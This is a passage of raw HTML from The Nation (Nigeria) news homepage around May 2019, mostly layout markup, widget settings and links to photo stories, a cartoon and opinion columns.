jnews_module_915165_22_5cdd84c9efff0 = {"header_icon":"","first_title":"Sponsored Posts","second_title":"","url":"http:\/\/thenationonlineng.net\/category\/sponsored-post\/","header_type":"heading_6","header_background":"","header_secondary_background":"","header_text_color":"","header_line_color":"","header_accent_color":"","header_filter_category":"","header_filter_author":"","header_filter_tag":"","header_filter_text":"All","post_type":"post","content_type":"post","number_post":"5","post_offset":"0","unique_content":"disable","include_post":"","exclude_post":"","include_category":"95168","exclude_category":"","include_author":"","include_tag":"","exclude_tag":"","sort_by":"latest","date_format":"custom","date_format_custom":"g:i a ","excerpt_length":"20","excerpt_ellipsis":"...","pagination_mode":"disable","pagination_nextprev_showtext":"","pagination_number_post":"4","pagination_scroll_limit":"0","boxed":"","boxed_shadow":"","el_id":"","el_class":"","scheme":"normal","column_width":"auto","title_color":"","accent_color":"","alt_color":"","excerpt_color":"","css":"","paged":1,"column_class":"jeg_col_1o3","class":"jnews_block_16"};</script> </div></div><div class="widget widget_jnews_facebook_page" id="jnews_facebook_page-2"> <div class="jeg_facebook_widget"> <div class="fb-page" data-href="https://facebook.com/thenationng/" data-small-header="1" data-adapt-container-width="true" data-hide-cover="false" data-show-facepile="true" data-tabs="false" data-height="500" data-id="523460281518989"> </div> </div> </div><div class="widget widget_jnews_twitter" id="jnews_twitter-2"> <div class="jeg_twitter_widget"> <a class="twitter-timeline" height="500" href="https://twitter.com/TheNationNews" data-screen-name="TheNationNews" data-show-replies="false" data-theme="light" data-link-color="#1da1f2" data-tweet-limit="" data-chrome=""></a> </div> </div> </div> </div> <div class="row vc_row vc_inner vc_row-fluid vc_custom_1535119933649 vc_row-has-fill"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="jeg_wrapper "><div class="wpb_wrapper"></div></div></div></div><div class="jeg_postblock_9 jeg_postblock jeg_module_hook jeg_pagination_disable jeg_col_1o3 jnews_module_915165_23_5cdd84ca013c1 " data-unique="jnews_module_915165_23_5cdd84ca013c1"> <div class="jeg_block_heading jeg_block_heading_6 jeg_subcat_right"> <h3 class="jeg_block_title"><a href="https://thenationonlineng.net/category/commentaries/cartoon/"><span>Cartoon</span></a></h3> </div> <div class="jeg_block_container"> <div class="jeg_posts_wrap"> <div class="jeg_posts jeg_load_more_flag"> <article class="jeg_post jeg_pl_md_1 post-1039315 post type-post status-publish format-standard has-post-thumbnail hentry category-cartoon tag-extortion-on-highway tag-police tag-robbery tag-says-commissioner"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/police-extortion-on-highway-is-robbery-says-commissioner/"><div class="thumbnail-container animate-lazy size-500 "><img width="360" height="180" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-360x180 size-jnews-360x180 lazyload wp-post-image" alt="Police extortion on highway is robbery, says Commissioner" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/Cartoon-360x180.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/05/Cartoon-360x180.jpg 360w, https://thenationonlineng.net/wp-content/uploads/2019/05/Cartoon-750x375.jpg 750w, https://thenationonlineng.net/wp-content/uploads/2019/05/Cartoon-1140x570.jpg 1140w" data-expand="700" /></div></a> <div class="jeg_post_category"> <span><a href="https://thenationonlineng.net/category/commentaries/cartoon/" class="category-cartoon">Cartoon</a></span> </div> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/police-extortion-on-highway-is-robbery-says-commissioner/">Police extortion on highway is robbery, says Commissioner</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/police-extortion-on-highway-is-robbery-says-commissioner/"><i class="fa fa-clock-o"></i> May 14, 2019</a></div></div> </div> </article> </div> </div> <div class='module-overlay'> <div class='preloader_type preloader_dot'> <div class="module-preloader jeg_preloader dot"> <span></span><span></span><span></span> </div> <div class="module-preloader jeg_preloader circle"> <div class="jnews_preloader_circle_outer"> <div class="jnews_preloader_circle_inner"></div> </div> </div> <div class="module-preloader jeg_preloader square"> <div class="jeg_square"><div class="jeg_square_inner"></div></div> </div> </div> </div> </div> <div class="jeg_block_navigation"> <div class='navigation_overlay'><div class='module-preloader jeg_preloader'><span></span><span></span><span></span></div></div> </div> <script>var jnews_module_915165_23_5cdd84ca013c1 = {"header_icon":"","first_title":"Cartoon","second_title":"","url":"http:\/\/thenationonlineng.net\/category\/commentaries\/cartoon\/","header_type":"heading_6","header_background":"","header_secondary_background":"","header_text_color":"","header_line_color":"","header_accent_color":"","header_filter_category":"","header_filter_author":"","header_filter_tag":"","header_filter_text":"All","post_type":"post","content_type":"all","number_post":"1","post_offset":"0","unique_content":"disable","include_post":"","exclude_post":"","include_category":"45341","exclude_category":"","include_author":"","include_tag":"","exclude_tag":"","sort_by":"latest","date_format":"default","date_format_custom":"Y\/m\/d","pagination_mode":"disable","pagination_nextprev_showtext":"","pagination_number_post":4,"pagination_scroll_limit":0,"boxed":"","boxed_shadow":"","el_id":"","el_class":"","scheme":"","column_width":"auto","title_color":"","accent_color":"","alt_color":"","excerpt_color":"","css":"","compatible_column_notice":"","paged":1,"column_class":"jeg_col_1o3","class":"jnews_block_9"};</script> </div></div></div></div></div><div data-vc-full-width="true" data-vc-full-width-init="false" class="row vc_row vc_custom_1483584986908 vc_row-has-fill"><div class="jeg-vc-wrapper"><div class="wpb_column jeg_column vc_column_container vc_col-sm-12 vc_hidden-sm vc_hidden-xs jeg_main_content"><div class="jeg_wrapper wpb_wrapper"><div class="jeg_block_heading jeg_block_heading_1 jeg_alignleft jnews_module_915165_24_5cdd84ca04454 "> <h3 class="jeg_block_title"><a href="https://thenationonlineng.net/category/photo-video/"><span>Video/Photo News</span></a></h3> </div><div class="jeg_heroblock jeg_heroblock_2 jeg_col_3o3 jeg_hero_style_1 jnews_module_915165_25_5cdd84ca048d3 " data-margin="2"> <div class="jeg_heroblock_wrapper" style='margin: 0px 0px -2px -2px;'> <article class="jeg_post jeg_hero_item_1 post-1037796 post type-post status-publish format-standard has-post-thumbnail hentry category-featured category-news-update category-photo-video tag-asiwaju-ahmed-bola-tinubu tag-muhammadu-buhari tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper" style="padding: 0 0 2px 2px;"> <div class="jeg_block_container"> <span class="jeg_postformat_icon"></span> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/photos-buhari-breaks-fast-with-tinubu-at-aso-rock/"><div class="thumbnail-container thumbnail-background" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/Capture-14-750x503.png"> <div class="lazyloaded" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/Capture-14-750x503.png" style="background-image: url(https://thenationonlineng.net/wp-content/uploads/2019/05/Capture-14-750x503.png)"></div> </div></a> </div> <div class="jeg_postblock_content"> <div class="jeg_post_category"><a href="https://thenationonlineng.net/category/featured/" class="category-featured">Featured</a></div> <div class="jeg_post_info"> <h2 class="jeg_post_title"> <a href="https://thenationonlineng.net/photos-buhari-breaks-fast-with-tinubu-at-aso-rock/">PHOTOS: Buhari breaks fast with Tinubu at Aso Rock</a> </h2> <div class="jeg_post_meta"><div class="jeg_meta_author"><span class="by">by</span> <a href="https://thenationonlineng.net/author/bello-shehu/">Shehu Bello</a></div><div class="jeg_meta_date"><a href="https://thenationonlineng.net/photos-buhari-breaks-fast-with-tinubu-at-aso-rock/"><i class="fa fa-clock-o"></i> May 10, 2019</a></div></div> </div> </div> </div> </article> <div class="jeg_heroblock_scroller"> <article class="jeg_post jeg_hero_item_2 post-1036908 post type-post status-publish format-standard has-post-thumbnail hentry category-news-update category-photo-video tag-nigeria-news tag-nigerian-newspapers tag-the-nation-newspaper" style="padding: 0 0 2px 2px;"> <div class="jeg_block_container"> <span class="jeg_postformat_icon"></span> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/photos-apc-supporters-celebrate-oyetolas-victory-at-appeal-court/"><div class="thumbnail-container thumbnail-background" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/IMG-20190509-WA0034-750x420.jpg"> <div class="lazyloaded" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/IMG-20190509-WA0034-750x420.jpg" style="background-image: url(https://thenationonlineng.net/wp-content/uploads/2019/05/IMG-20190509-WA0034-750x420.jpg)"></div> </div></a> </div> <div class="jeg_postblock_content"> <div class="jeg_post_category"> <a href="https://thenationonlineng.net/category/news-update/" class="category-news-update">News Update</a> </div> <div class="jeg_post_info"> <h2 class="jeg_post_title"> <a href="https://thenationonlineng.net/photos-apc-supporters-celebrate-oyetolas-victory-at-appeal-court/">Photos: APC supporters celebrate Oyetola’s victory at Appeal Court</a> </h2> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/photos-apc-supporters-celebrate-oyetolas-victory-at-appeal-court/"><i class="fa fa-clock-o"></i> May 9, 2019</a></div></div> </div> </div> </div> </article><article class="jeg_post jeg_hero_item_3 post-1034619 post type-post status-publish format-standard has-post-thumbnail hentry category-featured category-news-update category-photo-video" style="padding: 0 0 2px 2px;"> <div class="jeg_block_container"> <span class="jeg_postformat_icon"></span> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/photos-president-buhari-returns-from-london/"><div class="thumbnail-container thumbnail-background" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/PRESIDENT-BUHARI-RETURNED-5-750x472.jpg"> <div class="lazyloaded" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/PRESIDENT-BUHARI-RETURNED-5-750x472.jpg" style="background-image: url(https://thenationonlineng.net/wp-content/uploads/2019/05/PRESIDENT-BUHARI-RETURNED-5-750x472.jpg)"></div> </div></a> </div> <div class="jeg_postblock_content"> <div class="jeg_post_category"> <a href="https://thenationonlineng.net/category/featured/" class="category-featured">Featured</a> </div> <div class="jeg_post_info"> <h2 class="jeg_post_title"> <a href="https://thenationonlineng.net/photos-president-buhari-returns-from-london/">PHOTOS: President Buhari returns from London</a> </h2> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/photos-president-buhari-returns-from-london/"><i class="fa fa-clock-o"></i> May 5, 2019</a></div></div> </div> </div> </div> </article><article class="jeg_post jeg_hero_item_4 post-1033751 post type-post status-publish format-standard has-post-thumbnail hentry category-photo-video" style="padding: 0 0 2px 2px;"> <div class="jeg_block_container"> <span class="jeg_postformat_icon"></span> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/photos-hon-sugar-laid-to-rest/"><div class="thumbnail-container thumbnail-background" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/IMG-20190503-WA0026-750x425.jpg"> <div class="lazyloaded" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/IMG-20190503-WA0026-750x425.jpg" style="background-image: url(https://thenationonlineng.net/wp-content/uploads/2019/05/IMG-20190503-WA0026-750x425.jpg)"></div> </div></a> </div> <div class="jeg_postblock_content"> <div class="jeg_post_category"> <a href="https://thenationonlineng.net/category/photo-video/" class="category-photo-video">Photo / Video</a> </div> <div class="jeg_post_info"> <h2 class="jeg_post_title"> <a href="https://thenationonlineng.net/photos-hon-sugar-laid-to-rest/">PHOTOS: Hon Sugar laid to rest</a> </h2> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/photos-hon-sugar-laid-to-rest/"><i class="fa fa-clock-o"></i> May 3, 2019</a></div></div> </div> </div> </div> </article><article class="jeg_post jeg_hero_item_5 post-1031955 post type-post status-publish format-standard has-post-thumbnail hentry category-news-update category-photo-video" style="padding: 0 0 2px 2px;"> <div class="jeg_block_container"> <span class="jeg_postformat_icon"></span> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/photo-zainab-aliyu-after-her-release/"><div class="thumbnail-container thumbnail-background" data-src="https://thenationonlineng.net/wp-content/uploads/2019/04/IMG-20190430-WA0001-1-750x563.jpg"> <div class="lazyloaded" data-src="https://thenationonlineng.net/wp-content/uploads/2019/04/IMG-20190430-WA0001-1-750x563.jpg" style="background-image: url(https://thenationonlineng.net/wp-content/uploads/2019/04/IMG-20190430-WA0001-1-750x563.jpg)"></div> </div></a> </div> <div class="jeg_postblock_content"> <div class="jeg_post_category"> <a href="https://thenationonlineng.net/category/news-update/" class="category-news-update">News Update</a> </div> <div class="jeg_post_info"> <h2 class="jeg_post_title"> <a href="https://thenationonlineng.net/photo-zainab-aliyu-after-her-release/">Photo: Zainab Aliyu after her release</a> </h2> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/photo-zainab-aliyu-after-her-release/"><i class="fa fa-clock-o"></i> April 30, 2019</a></div></div> </div> </div> </div> </article> </div> </div> </div> </div></div></div></div><div class="vc_row-full-width vc_clearfix"></div><div class="row vc_row"><div class="jeg-vc-wrapper"><div class="wpb_column jeg_column vc_column_container vc_col-sm-12 vc_hidden-lg vc_hidden-md jeg_main_content"><div class="jeg_wrapper wpb_wrapper"><div class='jeg_ad jeg_ad_module jnews_module_915165_26_5cdd84ca0cf32 '><div class='ads-wrapper'><div class=''><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><br /> <br /> <ins class="adsbygoogle" style="display: block;" data-ad-client="ca-pub-5089981496810613" data-ad-slot="4727903770" data-ad-format="auto" data-full-width-responsive="true"></ins><br /> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div></div></div></div></div></div></div><div class="row vc_row"><div class="jeg-vc-wrapper"><div class="wpb_column jeg_column vc_column_container vc_col-sm-12 vc_hidden-xs jeg_main_content"><div class="jeg_wrapper wpb_wrapper"><div class="jeg_block_heading jeg_block_heading_1 jeg_alignleft jnews_module_915165_27_5cdd84ca0d1f3 "> <h3 class="jeg_block_title"><span>Back Page</span></h3> </div><div class="row vc_row vc_inner vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-3"><div class="jeg_wrapper "><div class="wpb_wrapper"> <div class="vc_grid-container-wrapper vc_clearfix"> <div class="vc_grid-container vc_clearfix wpb_content_element vc_basic_grid" data-initial-loading-animation="none" data-vc-grid-settings="{&quot;page_id&quot;:915165,&quot;style&quot;:&quot;all&quot;,&quot;action&quot;:&quot;vc_get_vc_grid_data&quot;,&quot;shortcode_id&quot;:&quot;1557899413296-95fd7061-d54d-4&quot;,&quot;tag&quot;:&quot;vc_basic_grid&quot;}" data-vc-request="https://thenationonlineng.net/wp-admin/admin-ajax.php" data-vc-post-id="915165" data-vc-public-nonce="785f3df2cc"> <style type="text/css" data-type="vc_shortcodes-custom-css">.vc_custom_1556090977340{background-image: url(https://thenationonlineng.net/wp-content/uploads/2018/09/5af93eec2e08f-1.jpg?id=919517) !important;}.vc_custom_1535358090352{padding: 5px !important;background-color: #dd3333 !important;}.vc_custom_1419254486087{background-color: #f2f2f2 !important;}</style><div class="vc_grid vc_row vc_pageable-wrapper vc_hook_hover" data-vc-pageable-content="true"><div class="vc_pageable-slide-wrapper vc_clearfix" data-vc-grid-content="true"><div class="vc_grid-item vc_clearfix vc_col-sm-12"><div class="vc_grid-item-mini vc_clearfix "><div class="vc_gitem-animated-block vc_gitem-animate vc_gitem-animate-goTop20" data-vc-animation="goTop20"><div class="vc_gitem-zone vc_gitem-zone-a vc_custom_1556090977340 vc-gitem-zone-height-mode-auto vc-gitem-zone-height-mode-auto-3-4 vc_gitem-is-link"> <a href="https://thenationonlineng.net/forest-of-thousand-demons/" title="Forest of thousand demons" class="vc_gitem-link vc-zone-link"></a> <img src="https://thenationonlineng.net/wp-content/uploads/2018/09/5af93eec2e08f-1.jpg?id=919517" class="vc_gitem-zone-img" alt="Buhari election"> <div class="vc_gitem-zone-mini"> <div class="vc_gitem_row vc_row vc_gitem-row-position-bottom"><div class="vc_col-sm-12 vc_gitem-col vc_gitem-col-align-"><h6 style="color: #ffffff;text-align: center" class="vc_custom_heading vc_custom_1535358090352">Sam Omatseye</h6></div></div> </div> </div> <div class="vc_gitem-zone vc_gitem-zone-b vc-gitem-zone-height-mode-auto vc_gitem-is-link"> <a href="https://thenationonlineng.net/forest-of-thousand-demons/" title="Forest of thousand demons" class="vc_gitem-link vc-zone-link"></a> <div class="vc_gitem-zone-mini"> <div class="vc_gitem_row vc_row vc_gitem-row-position-bottom"><div class="vc_col-sm-12 vc_gitem-col vc_gitem-col-align- vc_custom_1419254486087"><div class="vc_custom_heading vc_gitem-post-data vc_gitem-post-data-source-post_title"><h4 style="text-align: left">Forest of thousand demons</h4></div><div class="vc_custom_heading vc_gitem-post-data vc_gitem-post-data-source-post_date"><div>May 13, 2019</div></div></div></div> </div> </div> </div> </div><div class="vc_clearfix"></div></div></div></div> </div> </div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-3"><div class="jeg_wrapper "><div class="wpb_wrapper"> <div class="vc_grid-container-wrapper vc_clearfix"> <div class="vc_grid-container vc_clearfix wpb_content_element vc_basic_grid" data-initial-loading-animation="none" data-vc-grid-settings="{&quot;page_id&quot;:915165,&quot;style&quot;:&quot;all&quot;,&quot;action&quot;:&quot;vc_get_vc_grid_data&quot;,&quot;shortcode_id&quot;:&quot;1557899413297-9bef3217-e30d-6&quot;,&quot;tag&quot;:&quot;vc_basic_grid&quot;}" data-vc-request="https://thenationonlineng.net/wp-admin/admin-ajax.php" data-vc-post-id="915165" data-vc-public-nonce="785f3df2cc"> <style type="text/css" data-type="vc_shortcodes-custom-css">.vc_custom_1556090961140{background-image: url(http://thenationonlineng.net/wp-content/uploads/2018/09/olatunji-dare-1-1.jpg?id=919519) !important;}.vc_custom_1535360117804{padding-top: 5px !important;padding-right: 5px !important;padding-bottom: 5px !important;padding-left: 5px !important;background-color: #dd3333 !important;}.vc_custom_1419254486087{background-color: #f2f2f2 !important;}</style><div class="vc_grid vc_row vc_pageable-wrapper vc_hook_hover" data-vc-pageable-content="true"><div class="vc_pageable-slide-wrapper vc_clearfix" data-vc-grid-content="true"><div class="vc_grid-item vc_clearfix vc_col-sm-12"><div class="vc_grid-item-mini vc_clearfix "><div class="vc_gitem-animated-block vc_gitem-animate vc_gitem-animate-goTop20" data-vc-animation="goTop20"><div class="vc_gitem-zone vc_gitem-zone-a vc_custom_1556090961140 vc-gitem-zone-height-mode-auto vc-gitem-zone-height-mode-auto-3-4 vc_gitem-is-link"> <a href="https://thenationonlineng.net/war-boko-haram-comes-newsroom/" title="The war on Boko Haram comes to the newsroom" class="vc_gitem-link vc-zone-link"></a> <img src="https://thenationonlineng.net/wp-content/uploads/2018/09/olatunji-dare-1-1.jpg?id=919519" class="vc_gitem-zone-img" alt="Army Nasarawa"> <div class="vc_gitem-zone-mini"> <div class="vc_gitem_row vc_row vc_gitem-row-position-bottom"><div class="vc_col-sm-12 vc_gitem-col vc_gitem-col-align-"><h6 style="color: #ffffff;text-align: center" class="vc_custom_heading vc_custom_1535360117804">Olatunji Dare</h6></div></div> </div> </div> <div class="vc_gitem-zone vc_gitem-zone-b vc-gitem-zone-height-mode-auto vc_gitem-is-link"> <a href="https://thenationonlineng.net/war-boko-haram-comes-newsroom/" title="The war on Boko Haram comes to the newsroom" class="vc_gitem-link vc-zone-link"></a> <div class="vc_gitem-zone-mini"> <div class="vc_gitem_row vc_row vc_gitem-row-position-bottom"><div class="vc_col-sm-12 vc_gitem-col vc_gitem-col-align- vc_custom_1419254486087"><div class="vc_custom_heading vc_gitem-post-data vc_gitem-post-data-source-post_title"><h4 style="text-align: left">The war on Boko Haram comes to the newsroom</h4></div><div class="vc_custom_heading vc_gitem-post-data vc_gitem-post-data-source-post_date"><div>January 8, 2019</div></div></div></div> </div> </div> </div> </div><div class="vc_clearfix"></div></div></div></div> </div> </div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-3"><div class="jeg_wrapper "><div class="wpb_wrapper"> <div class="vc_grid-container-wrapper vc_clearfix"> <div class="vc_grid-container vc_clearfix wpb_content_element vc_basic_grid" data-initial-loading-animation="none" data-vc-grid-settings="{&quot;page_id&quot;:915165,&quot;style&quot;:&quot;all&quot;,&quot;action&quot;:&quot;vc_get_vc_grid_data&quot;,&quot;shortcode_id&quot;:&quot;1557899413298-80390d52-1810-3&quot;,&quot;tag&quot;:&quot;vc_basic_grid&quot;}" data-vc-request="https://thenationonlineng.net/wp-admin/admin-ajax.php" data-vc-post-id="915165" data-vc-public-nonce="785f3df2cc"> <style type="text/css" data-type="vc_shortcodes-custom-css">.vc_custom_1556090944968{background-image: url(http://thenationonlineng.net/wp-content/uploads/2018/09/Luis-Odion-1.jpg?id=919536) !important;}.vc_custom_1535361413293{padding-top: 5px !important;padding-right: 5px !important;padding-bottom: 5px !important;padding-left: 5px !important;background-color: #dd3333 !important;}.vc_custom_1419254486087{background-color: #f2f2f2 !important;}</style><div class="vc_grid vc_row vc_pageable-wrapper vc_hook_hover" data-vc-pageable-content="true"><div class="vc_pageable-slide-wrapper vc_clearfix" data-vc-grid-content="true"><div class="vc_grid-item vc_clearfix vc_col-sm-12"><div class="vc_grid-item-mini vc_clearfix "><div class="vc_gitem-animated-block vc_gitem-animate vc_gitem-animate-goTop20" data-vc-animation="goTop20"><div class="vc_gitem-zone vc_gitem-zone-a vc_custom_1556090944968 vc-gitem-zone-height-mode-auto vc-gitem-zone-height-mode-auto-3-4 vc_gitem-is-link"> <a href="https://thenationonlineng.net/kano-the-insolent-meets-the-unthinkable/" title="Kano: The insolent meets the unthinkable" class="vc_gitem-link vc-zone-link"></a> <img src="https://thenationonlineng.net/wp-content/uploads/2018/09/Luis-Odion-1.jpg?id=919536" class="vc_gitem-zone-img" alt="kano emirate"> <div class="vc_gitem-zone-mini"> <div class="vc_gitem_row vc_row vc_gitem-row-position-bottom"><div class="vc_col-sm-12 vc_gitem-col vc_gitem-col-align-"><h6 style="color: #ffffff;text-align: center" class="vc_custom_heading vc_custom_1535361413293">Louis Odion</h6></div></div> </div> </div> <div class="vc_gitem-zone vc_gitem-zone-b vc-gitem-zone-height-mode-auto vc_gitem-is-link"> <a href="https://thenationonlineng.net/kano-the-insolent-meets-the-unthinkable/" title="Kano: The insolent meets the unthinkable" class="vc_gitem-link vc-zone-link"></a> <div class="vc_gitem-zone-mini"> <div class="vc_gitem_row vc_row vc_gitem-row-position-bottom"><div class="vc_col-sm-12 vc_gitem-col vc_gitem-col-align- vc_custom_1419254486087"><div class="vc_custom_heading vc_gitem-post-data vc_gitem-post-data-source-post_title"><h4 style="text-align: left">Kano: The insolent meets the unthinkable</h4></div><div class="vc_custom_heading vc_gitem-post-data vc_gitem-post-data-source-post_date"><div>May 14, 2019</div></div></div></div> </div> </div> </div> </div><div class="vc_clearfix"></div></div></div></div> </div> </div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-3"><div class="jeg_wrapper "><div class="wpb_wrapper"> <div class="vc_grid-container-wrapper vc_clearfix"> <div class="vc_grid-container vc_clearfix wpb_content_element vc_basic_grid" data-initial-loading-animation="none" data-vc-grid-settings="{&quot;page_id&quot;:915165,&quot;style&quot;:&quot;all&quot;,&quot;action&quot;:&quot;vc_get_vc_grid_data&quot;,&quot;shortcode_id&quot;:&quot;1557899413298-0f6401d6-d787-7&quot;,&quot;tag&quot;:&quot;vc_basic_grid&quot;}" data-vc-request="https://thenationonlineng.net/wp-admin/admin-ajax.php" data-vc-post-id="915165" data-vc-public-nonce="785f3df2cc"> <style type="text/css" data-type="vc_shortcodes-custom-css">.vc_custom_1556090862536{background-image: url(http://thenationonlineng.net/wp-content/uploads/2018/09/gbega.jpg?id=919538) !important;}.vc_custom_1535361839561{padding-top: 5px !important;padding-right: 5px !important;padding-bottom: 5px !important;padding-left: 5px !important;background-color: #dd3333 !important;}.vc_custom_1419254486087{background-color: #f2f2f2 !important;}</style><div class="vc_grid vc_row vc_pageable-wrapper vc_hook_hover" data-vc-pageable-content="true"><div class="vc_pageable-slide-wrapper vc_clearfix" data-vc-grid-content="true"><div class="vc_grid-item vc_clearfix vc_col-sm-12"><div class="vc_grid-item-mini vc_clearfix "><div class="vc_gitem-animated-block vc_gitem-animate vc_gitem-animate-goTop20" data-vc-animation="goTop20"><div class="vc_gitem-zone vc_gitem-zone-a vc_custom_1556090862536 vc-gitem-zone-height-mode-auto vc-gitem-zone-height-mode-auto-3-4 vc_gitem-is-link"> <a href="https://thenationonlineng.net/tonto-dikeh-caramelo-girls-and-justice/" title="Tonto Dikeh, Caramelo girls and justice" class="vc_gitem-link vc-zone-link"></a> <img src="https://thenationonlineng.net/wp-content/uploads/2018/09/gbega.jpg?id=919538" class="vc_gitem-zone-img" alt=""> <div class="vc_gitem-zone-mini"> <div class="vc_gitem_row vc_row vc_gitem-row-position-bottom"><div class="vc_col-sm-12 vc_gitem-col vc_gitem-col-align-"><h6 style="color: #ffffff;text-align: center" class="vc_custom_heading vc_custom_1535361839561">Gbenga Omotoso</h6></div></div> </div> </div> <div class="vc_gitem-zone vc_gitem-zone-b vc-gitem-zone-height-mode-auto vc_gitem-is-link"> <a href="https://thenationonlineng.net/tonto-dikeh-caramelo-girls-and-justice/" title="Tonto Dikeh, Caramelo girls and justice" class="vc_gitem-link vc-zone-link"></a> <div class="vc_gitem-zone-mini"> <div class="vc_gitem_row vc_row vc_gitem-row-position-bottom"><div class="vc_col-sm-12 vc_gitem-col vc_gitem-col-align- vc_custom_1419254486087"><div class="vc_custom_heading vc_gitem-post-data vc_gitem-post-data-source-post_title"><h4 style="text-align: left">Tonto Dikeh, Caramelo girls and justice</h4></div><div class="vc_custom_heading vc_gitem-post-data vc_gitem-post-data-source-post_date"><div>May 16, 2019</div></div></div></div> </div> </div> </div> </div><div class="vc_clearfix"></div></div></div></div> </div> </div> </div></div></div></div><div class="row vc_row vc_inner vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-1/5"><div class="jeg_wrapper "><div class="wpb_wrapper"> <div class="vc_grid-container-wrapper vc_clearfix"> <div class="vc_grid-container vc_clearfix wpb_content_element vc_basic_grid" data-initial-loading-animation="none" data-vc-grid-settings="{&quot;page_id&quot;:915165,&quot;style&quot;:&quot;all&quot;,&quot;action&quot;:&quot;vc_get_vc_grid_data&quot;,&quot;shortcode_id&quot;:&quot;1557899413299-bdcb413c-8c17-0&quot;,&quot;tag&quot;:&quot;vc_basic_grid&quot;}" data-vc-request="https://thenationonlineng.net/wp-admin/admin-ajax.php" data-vc-post-id="915165" data-vc-public-nonce="785f3df2cc"> <style type="text/css" data-type="vc_shortcodes-custom-css">.vc_custom_1556090887444{background-image: url(http://thenationonlineng.net/wp-content/uploads/2018/09/Segun-Gbadegesin.jpg?id=919545) !important;}.vc_custom_1535362024411{padding-top: 5px !important;padding-right: 5px !important;padding-bottom: 5px !important;padding-left: 5px !important;background-color: #dd3333 !important;}.vc_custom_1419254486087{background-color: #f2f2f2 !important;}</style><div class="vc_grid vc_row vc_pageable-wrapper vc_hook_hover" data-vc-pageable-content="true"><div class="vc_pageable-slide-wrapper vc_clearfix" data-vc-grid-content="true"><div class="vc_grid-item vc_clearfix vc_col-sm-12"><div class="vc_grid-item-mini vc_clearfix "><div class="vc_gitem-animated-block vc_gitem-animate vc_gitem-animate-goTop20" data-vc-animation="goTop20"><div class="vc_gitem-zone vc_gitem-zone-a vc_custom_1556090887444 vc-gitem-zone-height-mode-auto vc-gitem-zone-height-mode-auto-3-4 vc_gitem-is-link"> <a href="https://thenationonlineng.net/beyond-the-politics-of-insecurity/" title="Beyond the politics of insecurity" class="vc_gitem-link vc-zone-link"></a> <img src="https://thenationonlineng.net/wp-content/uploads/2018/09/Segun-Gbadegesin.jpg?id=919545" class="vc_gitem-zone-img" alt="Buhari NPC"> <div class="vc_gitem-zone-mini"> <div class="vc_gitem_row vc_row vc_gitem-row-position-bottom"><div class="vc_col-sm-12 vc_gitem-col vc_gitem-col-align-"><h6 style="color: #ffffff;text-align: center" class="vc_custom_heading vc_custom_1535362024411">Segun Gbadegesin</h6></div></div> </div> </div> <div class="vc_gitem-zone vc_gitem-zone-b vc-gitem-zone-height-mode-auto vc_gitem-is-link"> <a href="https://thenationonlineng.net/beyond-the-politics-of-insecurity/" title="Beyond the politics of insecurity" class="vc_gitem-link vc-zone-link"></a> <div class="vc_gitem-zone-mini"> <div class="vc_gitem_row vc_row vc_gitem-row-position-bottom"><div class="vc_col-sm-12 vc_gitem-col vc_gitem-col-align- vc_custom_1419254486087"><div class="vc_custom_heading vc_gitem-post-data vc_gitem-post-data-source-post_title"><h4 style="text-align: left">Beyond the politics of insecurity</h4></div><div class="vc_custom_heading vc_gitem-post-data vc_gitem-post-data-source-post_date"><div>May 10, 2019</div></div></div></div> </div> </div> </div> </div><div class="vc_clearfix"></div></div></div></div> </div> </div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-1/5"><div class="jeg_wrapper "><div class="wpb_wrapper"> <div class="vc_grid-container-wrapper vc_clearfix"> <div class="vc_grid-container vc_clearfix wpb_content_element vc_basic_grid" data-initial-loading-animation="none" data-vc-grid-settings="{&quot;page_id&quot;:915165,&quot;style&quot;:&quot;all&quot;,&quot;action&quot;:&quot;vc_get_vc_grid_data&quot;,&quot;shortcode_id&quot;:&quot;1557899413300-268d0ade-e922-3&quot;,&quot;tag&quot;:&quot;vc_basic_grid&quot;}" data-vc-request="https://thenationonlineng.net/wp-admin/admin-ajax.php" data-vc-post-id="915165" data-vc-public-nonce="785f3df2cc"> <style type="text/css" data-type="vc_shortcodes-custom-css">.vc_custom_1556090906941{background-image: url(http://thenationonlineng.net/wp-content/uploads/2018/09/Segun-Ayobolu.jpg?id=919544) !important;}.vc_custom_1537268419847{padding-top: 5px !important;padding-right: 5px !important;padding-bottom: 5px !important;padding-left: 5px !important;background-color: #dd3333 !important;}.vc_custom_1419254486087{background-color: #f2f2f2 !important;}</style><div class="vc_grid vc_row vc_pageable-wrapper vc_hook_hover" data-vc-pageable-content="true"><div 